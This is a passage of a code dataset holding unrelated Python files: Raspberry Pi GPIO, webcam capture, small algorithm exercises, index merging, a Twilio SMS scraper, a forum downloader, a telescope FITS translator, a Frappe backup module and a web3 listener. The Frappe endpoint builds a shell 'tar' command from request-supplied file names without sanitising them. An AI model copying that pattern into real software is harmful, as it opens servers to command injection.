GPIO.output(YELLOW_PIN,GPIO.HIGH)\n GPIO.output(RED_PIN, GPIO.LOW)\n GPIO.output(GREEN_PIN, GPIO.LOW)\n\n GPIO.add_event_detect(SENSOR_PIN, GPIO.RISING, callback=eventRegistered)\n\n while True:\n logging.debug(\"Sleep 60 seconds\")\n time.sleep(60)\n\n global LAST_MOVEMENT\n if(util.timestampIsOlderThanTwoMinutes(LAST_MOVEMENT)):\n logging.debug(\"TimeStamp older than two minutes\")\n GPIO.output(RED_PIN,GPIO.HIGH)\n GPIO.output(GREEN_PIN, GPIO.LOW)\n GPIO.output(YELLOW_PIN, GPIO.LOW)\n api.setStatusClose()\n\n except KeyboardInterrupt:\n logging.info(\"Close Application...!\")\n GPIO.cleanup()\n","repo_name":"roscha444/fsr-status-pi","sub_path":"src/status.py","file_name":"status.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"14783254088","text":"#Import Lib\nimport os\nimport cv2\nimport live_predictor\n# for frame rate\nimport time\n\n#------------------(Functions)----------------------#\n\n#greyscale images func Input(img.jpg) --> output(img.jpg)\ndef greyScale(img):\n return cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n#Create folder to save images to and saves directory\ndef createDir(letter: chr):\n #get directory of python file and add directory of the letter folder\n dir = os.getcwd()\n newDir = \"LetterData\\\\\" + letter\n dir = os.path.join(dir, newDir)\n\n #try creating the folder if it doent already exist\n try:\n if not os.path.exists(dir):\n os.makedirs(dir)\n except OSError:\n print(\"Error creating directory\" + dir)\n \n return dir\n\n\n#video Feed\n# if path == \"\" or scTime == 0 then frames will not be saved\ndef openVideo(path : str=\"\", scTime : int=0, make_predictions: bool=True):\n capture_mode = False if path == \"\" or scTime == 0 else True\n\n # logic for live language recognition\n sign_language_model = live_predictor.live_asl_model()\n \n # open webcam\n cap = cv2.VideoCapture(0)\n\n imgCnt = 0\n timmer = 0\n\n # frame rate\n curr_time = time.time()\n while(True):\n timmer += 1\n # Capture the video frame\n success, frame = cap.read()\n if not success:\n print(\"ignoring empty camera frame.\")\n continue\n\n # frame -> cropped image, top predictions, text\n # modify the frame base on which overlays to display\n success, cropped, predictions, text = sign_language_model.process(frame, make_predictions=make_predictions, overlay_bounding_box=True, \n overlay_landmarks=True, top_n=3)\n \n # cv2.imwrite(\"temp_img.png\", cropped) if success else 0\n\n # Display the resulting frame\n cv2.putText(frame, f\"predicted letter: {predictions}\", (50,50), cv2.FONT_HERSHEY_SIMPLEX, 1, (209,80,0,255), 2, cv2.LINE_AA)\n cv2.putText(frame, f\"current text: {text}\", (50,100), cv2.FONT_HERSHEY_SIMPLEX, 1, (209,80,0,255), 2, cv2.LINE_AA)\n cv2.putText(frame, f\"frame rate: {1 / (time.time() - curr_time)}\", (50,150), cv2.FONT_HERSHEY_SIMPLEX, 1, (209,80,0,255), 2, cv2.LINE_AA)\n cv2.imshow('frame', frame)\n # cv2.displayOverlay('frame', f\"predicted letter: {predictions}\")\n # the overlay could include more information\n # the openVideo function could take in some more parameters, giving the option to show more data on overlay\n\n # print text to console\n os.system(\"cls\")\n print(f\"predicted letter: {predictions}\")\n print(\"current text:\\n\", text)\n print(f\"frame rate: {1 / (time.time() - curr_time)}\")\n curr_time = time.time()\n\n # hotkey assignment\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n elif capture_mode and timmer % scTime == 0:\n imgName = f\"{imgCnt}.png\"\n cv2.imwrite(os.path.join(path, imgName), cropped if success else frame)\n imgCnt += 1\n\n if cv2.waitKey(1) & 0xFF == ord('c'):\n sign_language_model.text_prediction.reset()\n \n \n # After the loop release the cap object\n cap.release()\n\n #Destroy all the windows\n cv2.destroyAllWindows()\n\n#--------------------(Main)-------------------------#\ndef main():\n dir = createDir('c')\n openVideo(dir, 150, make_predictions=False)\n\nif __name__ == \"__main__\":\n main()","repo_name":"hendrixgg/qmind-SLR2","sub_path":"WebCam.py","file_name":"WebCam.py","file_ext":"py","file_size_in_byte":3423,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"35587980466","text":"import sys\ninput = sys.stdin.readline\n\nt = int(input())\nfor _ in range(t):\n\n n = int(input())\n\n fivo = [0,1]\n for i in range(2,50):\n fivo.append(fivo[i-1] + fivo[i-2])\n\n answer = []\n while n:\n for i in range(len(fivo)):\n if n >= fivo[i]: \n temp = fivo[i] \n \n n = n - temp\n answer.append(temp)\n \n answer.sort() \n for i in answer:\n print(i, end = \" \")\n \n \n\n\n\n\n\n\n","repo_name":"agilestar8/coding-test-","sub_path":"baekjoon/그리디 알고리즘/9009.py","file_name":"9009.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20051643364","text":"def next_alpha(arr, x):\n n = len(arr)\n res = None\n l, r = 0, n-1\n while l <= r:\n mid = l + (r-l)//2\n if arr[mid] < x:\n l = mid + 1\n else:\n res = arr[mid]\n r = mid - 1\n return res\n","repo_name":"DEVHrishi/DSA--PYTHON--SQL","sub_path":"Binary_search/Easy/Next Alphabetical Element.py","file_name":"Next Alphabetical Element.py","file_ext":"py","file_size_in_byte":248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70275559210","text":"\n#!/usr/bin/python\nimport xml.sax\nimport nltk,sys,time\nimport timeit\nfrom nltk.stem import PorterStemmer\nfrom collections import defaultdict\nfrom operator import itemgetter\n#nltk.download('corpus')\n#from nltk.corpus import wordnet\nimport re\nimport json\nfrom itertools import izip\nfrom heapq import heapify, heappush, heappop\nimport os\n\n\nstart = timeit.default_timer()\nfolder = \"final_index/\"\nindexFileCount = 0\nsecondaryIndex = dict()\nchunksize = 100000\n\ndef writeToPrimary():\n global folder\n global globalDict\n global indexFileCount\n offset = []\n firstWord = True\n indexFileCount += 1\n filename = folder+\"index\"+str(indexFileCount)+\".txt\"\n fp = open(filename,'wb')\n for i in sorted(globalDict):\n if firstWord:\n secondaryIndex[i] = indexFileCount\n firstWord = False\n toWrite = str(i)+\"=\"+globalDict[i]+\"\\n\"\n fp.write(toWrite)\n\ndef writeToSecondary():\n global secondaryIndex\n filename = folder+\"Secondary_Index.txt\"\n fp = open(filename,'wb')\n for i in sorted(secondaryIndex):\n tmp = str(i)+\" \"+str(secondaryIndex[i])+\"\\n\"\n fp.write(tmp)\n\n\nimport glob\nfiles = glob.glob('/Users/jayant/ire mini project/wiki_search_engine/20162073/created_files/*')\nprimary_index = open('/Users/jayant/ire mini project/wiki_search_engine/20162073/primary_index.txt','a')\n\n\ncompletedFile = [0]*len(files)\nfilePointers = dict()\ncurrentRowOfFile = dict()\npercolator = list()\nwords = dict()\ntotal = 0\nglobalDict = defaultdict()\n\nfor i in range(len(files)):\n completedFile[i] = 1;\n filePointers[i] = open(files[i],'r')\n currentRowOfFile[i] = filePointers[i].readline()\n words[i] = currentRowOfFile[i].strip().split('=')\n if words[i][0] not in percolator:\n heappush(percolator,words[i][0])\n\nwhile True:\n if completedFile.count(0) == len(files):\n break;\n else:\n total += 1\n word = heappop(percolator)\n for i in range(len(files)):\n if completedFile[i] and words[i][0] == word:\n if word in globalDict:\n globalDict[word] += ','+words[i][1]\n else:\n globalDict[word] = words[i][1]\n\n if total == chunksize:\n total = 0;\n writeToPrimary()\n globalDict.clear()\n\n currentRowOfFile[i] = filePointers[i].readline()\n currentRowOfFile[i] = currentRowOfFile[i].strip()\n\n if currentRowOfFile[i]:\n words[i] = currentRowOfFile[i].split('=')\n if words[i][0] not in percolator:\n heappush(percolator,words[i][0])\n else:\n completedFile[i] = 0\n filePointers[i].close()\n os.remove(files[i])\n\nwriteToPrimary()\nwriteToSecondary()\nstop = timeit.default_timer()\nprint (stop - start)\n","repo_name":"Btanwani77/Wiki-Search-Engine","sub_path":"merge.py","file_name":"merge.py","file_ext":"py","file_size_in_byte":2908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20354642273","text":"\"\"\"\nCookie web scraper for Maddy - Woohoo\n\"\"\"\nfrom flask import Flask\nimport requests\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\nfrom twilio.rest import Client\nimport os\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef main():\n chrome_options = webdriver.ChromeOptions()\n chrome_options.binary_location = os.environ.get(\"GOOGLE_CHROME_BIN\")\n chrome_options.add_argument(\"--headless\")\n chrome_options.add_argument(\"--disable-dev-shm-usage\")\n chrome_options.add_argument(\"--no-sandbox\")\n driver = webdriver.Chrome(\n executable_path=os.environ.get(\"CHROMEDRIVER_PATH\"),\n chrome_options=chrome_options,\n )\n driver.get(\"https://crumblcookies.com/\")\n weekList = driver.find_element_by_id(\"weekly-cookie-flavors\")\n weeklies = weekList.find_elements_by_tag_name(\"li\")\n\n cookies = \"This week's Crumbl flavors are:\\n\"\n for cookie in weeklies:\n flavor = cookie.find_elements_by_tag_name(\"h3\")[0].text\n cookies += flavor + \"\\n\"\n\n driver.close()\n\n account_id = os.environ.get(\"TWIL_ACCT\")\n auth_token = os.environ.get(\"AUTH_TOKEN\")\n client = Client(account_id, auth_token)\n\n message = client.messages.create(\n body=cookies, from_=\"+15036766473\", to=\"+19524262052\"\n )\n\n return cookies\n\n\nif __name__ == \"__main__\":\n app.run()\n","repo_name":"RyanSMcKenzie/my-cookie-sender","sub_path":"cookies.py","file_name":"cookies.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36786569142","text":"# -*- coding:gbk -*- \nimport urllib.request\nimport json\nimport time\nimport sys\n\n#二维字典相关\ndef dict2d_construct(thedict, key_a, key_b, val):\n if key_a in thedict:\n thedict[key_a].update({key_b: val})\n else:\n thedict.update({key_a:{key_b: val}})\n#输出相关\ndef printex(strs):\n\tsys.stdout.write(\" \\r\")\n\tsys.stdout.flush()\n\tsys.stdout.write(strs+\"\\r\")\n\tsys.stdout.flush()\n\t\ndef savefile(data,listhead,fw,fs):\n\tfor index in data:\n\t\tfor head in listhead:\n\t\t\tif head in data[index]:\n\t\t\t\ttry:\n\t\t\t\t\tfw.write(str(data[index][head]).replace(\"\\n\",\"\\\\n\")+\"\\t\")\n\t\t\t\texcept Exception as err:\n\t\t\t\t\tfw.write(\"【非文本格式信息】\\t\")\n\t\t\telse:\n\t\t\t\tfw.write(\"\\t\")\n\t\tfw.write(\"\\n\")\n\tfs.write(json.dumps(data))\n\n#初始化\nURL_LISTAPI = \"http://www.pkuhelper.com/services/pkuhole/api.php?action=getlist&p=\"\nURL_COMMENTAPI = \"http://www.pkuhelper.com/services/pkuhole/api.php?action=getcomment&pid=\"\n #上次错误保存的结果\ntry:\n\tp = int(open(\"lasterr.tmp\").read())\nexcept:\n\tp = 0\ndata = {}\nindex = 0\nlisthead = ['cid','pid','text','timestamp','hidden','anonymous','islz','name','type','reply','likenum','extra','url','hot','self_recordtime']\nfw = open(\"pkuhole.tab\",'a',encoding='gbk')\nfs = open(\"pkuhole.list\",'a',encoding='gbk')\n\n\nwhile(1):\n\t#下载与解析\n\t\n\ttry:\n\t\tresponse = urllib.request.urlopen(URL_LISTAPI + str(p))\n\t\tstrjson = response.read().decode('utf-8')\n\t\tljson = json.loads(strjson,strict = False)\n\texcept Exception as err:\n\t\tprint(err,p)\n\t\tsavefile(data,listhead,fw,fs)\n\t\topen(\"lasterr.tmp\",'w').write(str(p))\n\t\traise NameError(err)\n\t\t\n\t#没了的话收工\n\tif ljson['data']==[]:\n\t\tbreak\n\tprintex(\"Downloading the Page: \"+ str(p))\n\t\n\tfor post in ljson['data']:\n\t\t#先保存主洞\n\t\tindex += 1\n\t\tfor key in post:\n\t\t\tdict2d_construct(data,index,key,post[key])\n\t\t\tdict2d_construct(data,index,'self_recordtime',time.ctime())\n\t\t#如果有回复的话,再抓取回复\n\t\tif int(post['reply'])!=0:\n\t\t\ttry:\n\t\t\t\tresreply = urllib.request.urlopen(URL_COMMENTAPI + post['pid'])\n\t\t\t\tprintex(\"Downloading the Page: \"+ str(p) +\" -> reply\")\n\t\t\texcept Exception as err:\n\t\t\t\tprint(err,p)\n\t\t\t\tsavefile(data,listhead,fw,fs)\n\t\t\t\topen(\"lasterr.tmp\",'w').write(str(p))\n\t\t\t\traise NameError(err)\n\t\t\t\t\n\t\t\tstrjson = resreply.read().decode('utf-8')\n\t\t\trjson = json.loads(strjson,strict = False)\n\t\t\tfor reply in rjson['data']:\n\t\t\t\tindex += 1\n\t\t\t\tfor key in reply:\n\t\t\t\t\tdict2d_construct(data,index,key,reply[key])\n\t\t\t\t\tdict2d_construct(data,index,'self_recordtime',time.ctime())\n\tp += 1\n\ttime.sleep(0.1)\n#写tab文件\n\n\n\n#清空上次保存\nopen(\"lasterr.tmp\",'w').write(\"0\")","repo_name":"byemypast/PKUHoleDownload","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2560,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"20449983944","text":"\n__all__ = (\"VircamTranslator\", )\n\nfrom astro_metadata_translator import cache_translation, FitsTranslator\nfrom astro_metadata_translator.translators.helpers import (\n tracking_from_degree_headers,altaz_from_degree_headers)\nimport astropy.units as u\nfrom astropy.time import Time\nfrom astropy.coordinates import SkyCoord, Angle, AltAz, EarthLocation\nfrom astropy.io import fits\nfrom astropy.wcs import WCS\n\nclass VircamTranslator(FitsTranslator):\n \"\"\"Metadata translator for VISTA FITS headers.\n\n Under normal circumstances, translators are found in the astro_metadata_translator \n repository. However, it is possible to also put them in an obs_package, provided that \n they are imported in both the _instrument.py and rawFormatter.py files.\n\n This one is in obs_vista to keep everything togeter in one place. \n \"\"\"\n\n \"\"\"Name of this translation class\"\"\"\n name = \"VIRCAM\"\n\n \"\"\"Supports the VIRCAM instrument.\"\"\"\n supported_instrument = \"VIRCAM\"\n\n \"\"\"\n _const_map includes properties that you may not know, nor can calculate.\n \n Bear in mind that some examples listed here as \"None\" may require units or be a \n specific class should you want to upgrade them to _trivial_map or to_<>. \n For example, \"altaz_begin\" needs to be an astropy.coordinates.AltAz class. \n \n https://www.eso.org/sci/facilities/paranal/instruments/vircam/inst.html\n On the sky (in the default instrument rotator position) +Y corresponds to N, \n and +X to West:\n \"\"\"\n _const_map = {\"boresight_rotation_coord\": \"sky\",\n \"detector_group\": None,\n \"boresight_airmass\": None, # This could be calculated.\n # \"boresight_rotation_angle\": Angle(0 * u.deg),\n \"science_program\": None,\n # \"temperature\": 300. * u.K,\n \"pressure\": 985. * u.hPa,\n \"relative_humidity\": None,\n # \"altaz_begin\": AltAz(0*u.deg,90*u.deg), # This could be calculated.\n #\"location\": None,\n }\n\n \"\"\"\n _trivial_map includes properties that can be taken directly from header\n \"\"\"\n _trivial_map = {\n #\"exposure_id\": \"ESO DET EXP NO\",\n #\"visit_id\": \"ESO DET EXP NO\",\n #\"temperature\":(\"ESO INS THERMAL AMB MEAN\", dict(unit=u.K)),\n #\"boresight_airmass\": \"\"\n \"observation_id\": \"ESO DET EXP NO\",\n #\"detector_exposure_id\": \"ESO DET EXP NO\",\n \"detector_num\": \"ESO DET CHIP NO\",\n \"detector_serial\": \"ESO DET CHIP NO\",\n # \"physical_filter\": \"HIERARCH ESO INS FILT1 NAME\",\n #\"dithers\": \"ESO DET NDIT\",\n \"exposure_time\": (\"EXPTIME\", dict(unit=u.s)),\n \"dark_time\": (\"EXPTIME\", dict(unit=u.s)),\n # This is a hack we need to merge to primary header\n \"object\": \"ORIGIN\",\n #\"observation_type\": \"ESO DPR TYPE\",\n \"telescope\": (\"TELESCOP\", dict(default=\"VISTA\")),\n \"instrument\": (\"INSTRUME\", dict(default=\"VIRCAM\")),\n }\n \n# detector_names = {\n# 1: '1', 2: '2', 3: '3', 4: '4', 5: '5', 6: '6', 7: '7', 8: '8', \n# 9: '9', 10: '10', 11: '11', 12: '12', 13: '13', 14: '14', 15: '15', 16: '16', }\n\n @classmethod\n def can_translate(cls, header, filename=None):\n \"\"\"\n butler ingest-raws cycles through the known translators, using this method to \n determine whether each one can translate supplied header. \n\n This example just checks the INSTRUME header keyword and returns True if it \n contains \"VIRCAM\". However, you can make this as stringent as you like (e.g., \n perhaps you can currently handle a limited range of filters) \n\n Parameters\n ----------\n header : `dict`-like\n Header to convert to standardized form.\n filename : `str`, optional\n Name of file being translated.\n Returns\n -------\n can : `bool`\n `True` if the header is recognized by this class. `False`\n otherwise.\n \"\"\"\n\n # Use INSTRUME. Because of defaulting behavior only do this\n # if we really have an INSTRUME header\n\n# if \"INSTRUME\" in header:\n# \n# if header[\"INSTRUME\"] == \"VIRCAM\":\n# \n# return True\n# return False\n if \"INSTRUME\" in header:\n via_instrume = super().can_translate(header, filename=filename)\n if via_instrume:\n return via_instrume\n# if cls.is_keyword_defined(header, \"FILTER\") and \"VIRCAM\" in header[\"FILTER\"]:\n# return True\n return False\n\n \"\"\"\n The to_<> methods are used when properties can't be trivially taken from the \n header. \n \n For example, the date in the header needs to be converted into an astropy.Time class.\n \"\"\"\n @cache_translation\n def to_datetime_begin(self):\n\n date = self._header[\"DATE-OBS\"]\n # print(date)\n #date = [date[0:4], date[4:6], date[6:]]\n #date = '-'.join(date)\n t = Time(date, format=\"isot\", scale=\"utc\")\n return t\n \n @cache_translation\n def to_boresight_rotation_angle(self):\n \"\"\"\"Give zero for typical pointing == -90deg\"\"\"\n #primary=fits.open(self.filename)[0]\n #posang=primary.header[\"HIERARCH ESO TEL POSANG\"]\n posang=self._header[\"ESO TEL POSANG\"]\n return Angle(-(posang + 90.)* u.deg) #+90?\n \n# @cache_translation\n# def to_boresight_airmass(self):\n# return self._header[\"ESO OBS AIRM \"] # requested maximum - not available for stack\n\n @cache_translation\n def to_datetime_end(self):\n datetime_end = self.to_datetime_begin() + self.to_exposure_time()\n return datetime_end\n \n @cache_translation\n def to_temperature(self):\n\n #print(self._header)\n# primary=fits.open(self.filename)[0]\n# temp=primary.header[\"ESO INS THERMAL AMB MEAN\"]*u.K\n temp=self._header[\"ESO INS THERMAL AMB MEAN\"]*u.K\n return temp\n \n @cache_translation\n def to_tracking_radec(self):\n # Docstring will be inherited. Property defined in properties.py\n radecsys = (\"RADECSYS\",)\n radecpairs = ((\"CRVAL1\", \"CRVAL2\"),)\n #print(\"FILENAME:\",self.filename)\n# #return None\n# \n# \n# wcs_input_dict = {\n# 'CTYPE1': self._header['CTYPE1'],\n# 'CUNIT1': 'deg',\n# 'CD1_1': self._header['CD1_1'], \n# 'CD1_2': self._header['CD1_2'] , \n# 'CRPIX1': self._header['CRPIX1'],\n# 'CRVAL1': self._header['CRVAL1'],\n# 'NAXIS1': self._header['NAXIS1'],\n# \n# 'CTYPE2': self._header['CTYPE2'],\n# 'CUNIT2': 'deg', \n# 'CD2_1': self._header['CD2_1'], \n# 'CD2_2': self._header['CD2_2'],\n# 'CRPIX2': self._header['CRPIX2'],\n# 'CRVAL2': self._header['CRVAL2'],\n# 'NAXIS2': self._header['NAXIS2'],\n# 'PV2_1': self._header['PV2_1'], \n# 'PV2_2': self._header['PV2_2'], \n# 'PV2_3': self._header['PV2_3'], \n# 'PV2_4': self._header['PV2_4'], \n# 'PV2_5': self._header['PV2_5'], \n# }\n# w = WCS(wcs_input_dict)\n #return w.pixel_to_world(0,0)\n #primary=fits.open(self.filename)[0]\n #c=SkyCoord(primary.header['RA'],primary.header['DEC'],unit='deg')\n #return c\n return tracking_from_degree_headers(self, radecsys, radecpairs, unit=u.deg)\n# return w.pixel_to_world(self._header['NAXIS1']/2,self._header['NAXIS2']/2)\n# print(self._header)\n# radecsys = (\"RADECSYS\",)\n# radecpairs = ((\"RA\", \"DEC\"),)\n# return tracking_from_degree_headers(self, radecsys, radecpairs, unit=u.deg)\n \n \n\n @cache_translation\n #Not working possibly due to not being in extension header\n def to_altaz_begin(self):\n # Docstring will be inherited. Property defined in properties.py\n# primary=fits.open(self.filename)[0]\n# return AltAz(primary.header[\"ESO TEL AZ\"]*u.deg,primary.header[\"ESO TEL ALT\"]*u.deg)\n return altaz_from_degree_headers(self, ((\"ESO TEL ALT\",\"ESO TEL AZ\"),),\n self.to_datetime_begin(), \n is_zd=set([\"ESO TEL ALT\"]))\n\n @cache_translation\n def to_physical_filter(self):\n \"\"\"Calculate physical filter.\n We are reading the headers from the image layers of a multiextension fits\n Not from the primary HDU\n\n Returns\n -------\n filter : `str`\n The full filter name.\n \"\"\"\n if self.is_key_ok(\"FILTER\"):\n value = 'VIRCAM-{}'.format(self._header[\"FILTER\"].strip())\n self._used_these_cards(\"FILTER\")\n return value\n elif self.is_key_ok(\"FLATCOR\"):\n value = 'VIRCAM-{}'.format(self._header[\"FLATCOR\"].split('_')[0])\n self._used_these_cards(\"FLATCOR\")\n return value\n else:\n return None\n \n @cache_translation\n def to_location(self):\n \"\"\"Calculate the observatory location.\n Returns\n -------\n location : `astropy.coordinates.EarthLocation`\n An object representing the location of the telescope.\n \"\"\"\n\n # Look up the value since files do not have location\n value = EarthLocation.of_site(\"paranal\")\n\n return value\n\n# @cache_translation\n# def to_instrument(self):\n# if self._header[\"INSTRUME\"].strip(\" \") == \"VIRCAM\":\n# return \"VIRCAM\"\n# else:\n# # It should never get here, given can_translate().\n# return \"Unknown\"\n# \n# def to_telescope(self):\n# return self.to_instrument()\n @cache_translation\n def to_exposure_id(self):\n \"\"\"Calculate exposure ID.\n Returns\n -------\n id : `int`\n ID of exposure.\n \"\"\"\n value = self._header[\"ESO DET EXP NO\"]\n self._used_these_cards(\"ESO DET EXP NO\")\n return value\n\n @cache_translation\n def to_observation_counter(self):\n \"\"\"Return the lifetime exposure number.\n Returns\n -------\n sequence : `int`\n The observation counter.\n \"\"\"\n return self.to_exposure_id()\n\n @cache_translation\n def to_visit_id(self):\n # Docstring will be inherited. Property defined in properties.py\n return self.to_exposure_id()\n \n @cache_translation\n def to_detector_name(self):\n return '{:02d}'.format(self._header[\"ESO DET CHIP NO\"])\n# @cache_translation\n# def to_detector_name(self):\n# # Docstring will be inherited. Property defined in properties.py\n# name = self.to_detector_unique_name()\n# return name[1:]\n\n @cache_translation\n def to_observation_type(self):\n return 'science'\n \n @cache_translation\n def to_detector_exposure_id(self):\n # Docstring will be inherited. Property defined in properties.py\n exposure_id = self.to_exposure_id()\n if exposure_id is None:\n return None\n return int(\"{:07d}{:02d}\".format(exposure_id, self.to_detector_num()))\n\n# @cache_translation\n# def to_detector_group(self):\n# # Docstring will be inherited. Property defined in properties.py\n# name = self.to_detector_unique_name()\n# return name[0]\n\n# @cache_translation\n# def to_detector_name(self):\n# # Docstring will be inherited. Property defined in properties.py\n# name = self.to_detector_unique_name()\n# return name[1:]\n\n @classmethod\n def determine_translatable_headers(cls, filename, primary=None):\n \"\"\"Given a file return all the headers usable for metadata translation.\n VIRCAM files are multi-extension FITS with a primary header and\n each detector stored in a subsequent extension. VIRCAM uses\n ``INHERIT=T`` and each detector header will be merged with the\n primary header.\n Guide headers are not returned.\n Parameters\n ----------\n filename : `str`\n Path to a file in a format understood by this translator.\n primary : `dict`-like, optional\n The primary header obtained by the caller. This is sometimes\n already known, for example if a system is trying to bootstrap\n without already knowing what data is in the file. Will be\n merged with detector headers if supplied, else will be read\n from the file.\n Yields\n ------\n headers : iterator of `dict`-like\n Each detector header in turn. The supplied header will be merged\n with the contents of each detector header.\n Notes\n -----\n This translator class is specifically tailored to raw DECam data and\n is not designed to work with general FITS files. The normal paradigm\n is for the caller to have read the first header and then called\n `determine_translator()` on the result to work out which translator\n class to then call to obtain the real headers to be used for\n translation.\n \"\"\"\n # Circular dependency so must defer import.\n from astro_metadata_translator.headers import merge_headers\n\n # Since we want to scan many HDUs we use astropy directly to keep\n # the file open rather than continually opening and closing it\n # as we go to each HDU.\n\n with fits.open(filename) as fits_file:\n # Astropy does not automatically handle the INHERIT=T in\n # DECam headers so the primary header must be merged.\n first_pass = True\n\n for hdu in fits_file:\n if first_pass:\n if not primary:\n primary = hdu.header\n first_pass = False\n continue\n\n header = hdu.header\n if \"EXTNAME\" not in header: # Primary does not have\n continue\n\n yield merge_headers([primary, header], mode=\"overwrite\")\n","repo_name":"lsst-uk/obs_vista","sub_path":"python/lsstuk/obs/vista/translators/vircam.py","file_name":"vircam.py","file_ext":"py","file_size_in_byte":14354,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"14332547344","text":"import frappe, os\r\nfrom frappe.utils import get_url\r\n\r\n@frappe.whitelist()\r\ndef take_backup():\r\n\tbackup_dict = backup()\r\n\t\r\n\tdb_url = '/backups/%s' % os.path.basename(backup_dict.get('db'))\r\n\tfiles_url = '/backups/%s' % os.path.basename(backup_dict.get('files'))\r\n\tprivate_files_url = '/backups/%s' % os.path.basename(backup_dict.get('private_files'))\r\n\t\r\n\t# backupname\r\n\tsplit_name = os.path.basename(backup_dict.get('db')).split('_')\r\n\t\r\n\t# just get the filename\r\n\tbackup_name = '_'.join(split_name[:-1])\r\n\t\r\n\todb = backup_dict.get('odb')\r\n\tabs_paths = [odb.backup_path_db, odb.backup_path_files, odb.backup_path_private_files]\r\n\t\r\n\treturn {'db': db_url, 'files': files_url, 'private_files': private_files_url, 'backup_name': backup_name, 'abs_paths': abs_paths}\r\n\r\n@frappe.whitelist()\r\ndef zip_and_download_files(filename, files):\r\n\t\r\n\t# string to list\r\n\timport ast\r\n\tfiles = ast.literal_eval(files)\r\n\t\r\n\tzip_path = os.path.join(frappe.get_site_path(\"private\", \"backups\"), filename + \".consolebackup\")\r\n\t# this zip can be opened using tar only. not in windows\r\n\t# files are having paths relative from sites folder\r\n\tcmd_string = \"\"\"tar -cf %s %s\"\"\" % (zip_path, \" \".join(files))\t\t\r\n\terr, out = frappe.utils.execute_in_shell(cmd_string)\r\n\t\r\n\treturn '/backups/%s' % os.path.basename(zip_path)\r\n\t\r\ndef backup():\r\n\t# backup data\r\n\tfrom frappe.utils.backups import BackupGenerator\r\n\todb = BackupGenerator(frappe.conf.db_name, frappe.conf.db_name,\\\r\n\t\t\t\t\t\t frappe.conf.db_password, db_host = frappe.db.host)\r\n\t# older than is not applicable since its forced\r\n\todb.get_backup(older_than=1, ignore_files=False, force=True)\r\n\t\r\n\t# odb.backup_path_db\r\n\t# odb.backup_path_files\r\n\t# odb.backup_path_private_files\r\n\treturn {'db': odb.backup_path_db, 'files': odb.backup_path_files, 'private_files': odb.backup_path_private_files, 'odb': odb}\r\n\r\n\t\r\n","repo_name":"consoleerp/consoleerp_erpnext_client","sub_path":"consoleerp_erpnext_client/utils/system.py","file_name":"system.py","file_ext":"py","file_size_in_byte":1839,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"11100028085","text":"from web3 import Web3\nimport asyncio\nimport json\nimport os\nfrom pymongo import MongoClient\n\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\nprovider = Web3.HTTPProvider(os.getenv('PROVIDER'))\nweb3 = Web3(provider)\nprint(web3.isConnected())\nprint(os.getenv('MONGO_URI'))\nmdb = MongoClient(os.getenv('MONGO_URI_SPEC'))\n\n\n\n# this contract has been deployed on the goerli net\n# contract_address_saturn_box = os.getenv('ADDRESS_SATURN_BOX')\ncontract_address_saturn_mkp = os.getenv('ADDRESS_SATURN_MKP')\n# with open(\"./src/abi/abiSaturnBox.json\", \"r\") as f:\n# contract_abi_saturn_box = json.loads(f.read())\nwith open(\"./src/abi/abiSaturnMKP.json\", \"r\") as f:\n contract_abi_saturn_mkp = json.loads(f.read())\n\n# contract_saturn_box = web3.eth.contract(address=contract_address_saturn_box, abi=contract_abi_saturn_box)\ncontract_saturn_mkp = web3.eth.contract(address=contract_address_saturn_mkp, abi=contract_abi_saturn_mkp)\n\ndef handle_mint(event):\n args = event.get('args')\n tokenDetail = args.get('tokenDetail')\n agentDetail = tokenDetail[0]\n mdb[\"marketplace\"][\"token_info\"].update_one(filter={\n \"address\": args.get('requester')\n },\n update ={\n \"$set\":{\n f\"tokens.{agentDetail[0]}\":{\n \"tokenId\": agentDetail[0],\n \"agentId\": agentDetail[1],\n \"isOnchain\": agentDetail[2],\n \"baseRarity\": agentDetail[3],\n \"rarity\": agentDetail[4],\n \"level\": agentDetail[5],\n \"damage\": agentDetail[6],\n \"hp\": agentDetail[7],\n \"evasion\": agentDetail[8],\n \"armor\": agentDetail[9],\n \"combo\": agentDetail[10],\n \"precision\": agentDetail[11],\n \"accuracy\": agentDetail[12],\n \"counter\": agentDetail[13],\n \"reversal\": agentDetail[14],\n \"lock\": agentDetail[15],\n \"disarm\": agentDetail[16],\n \"speed\": agentDetail[17]\n }\n }\n },\n upsert=True\n )\n\ndef handle_event(event):\n event_data = Web3.toJSON(event)\n print(event_data)\n handle_mint(json.loads(event_data))\n\n\nasync def log_loop(event_filter, poll_interval):\n while True:\n for event in event_filter.get_new_entries():\n handle_event(event)\n await asyncio.sleep(poll_interval)\n\ndef main():\n # event_doPurchaseBox = contract_saturn_box.events.doPurchaseBox.createFilter(fromBlock='latest')\n # event_requestOnChain = contract_saturn_mkp.events.requestOnChain.createFilter(fromBlock='latest')\n # event_toOffChain = contract_saturn_mkp.events.toOffChain.createFilter(fromBlock='latest')\n # event_toOnChain = contract_saturn_mkp.events.toOnChain.createFilter(fromBlock='latest')\n # event_doSellNFT = contract_saturn_mkp.events.doSellNFT.createFilter(fromBlock='latest')\n # event_doPurchaseNFT = contract_saturn_mkp.events.doPurchaseNFT.createFilter(fromBlock='latest')\n event_mintToken = 